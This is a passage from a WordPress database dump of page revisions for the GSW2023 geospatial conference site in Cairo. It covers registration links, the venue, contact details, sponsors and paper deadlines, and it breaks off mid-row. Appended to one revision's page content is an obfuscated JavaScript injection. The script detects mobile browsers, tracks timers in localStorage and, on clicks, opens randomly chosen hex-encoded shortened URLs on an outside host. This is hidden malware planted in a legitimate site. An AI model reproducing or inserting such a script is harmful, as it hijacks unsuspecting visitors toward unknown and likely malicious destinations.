btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772272303{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis, Cairo, Egypt.t. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-29 12:44:44','2023-04-29 12:44:44','',3066,'https://gsw2023.com/?p=4135',0,'revision','',0),
(4136,1,'2023-04-29 12:45:34','2023-04-29 12:45:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  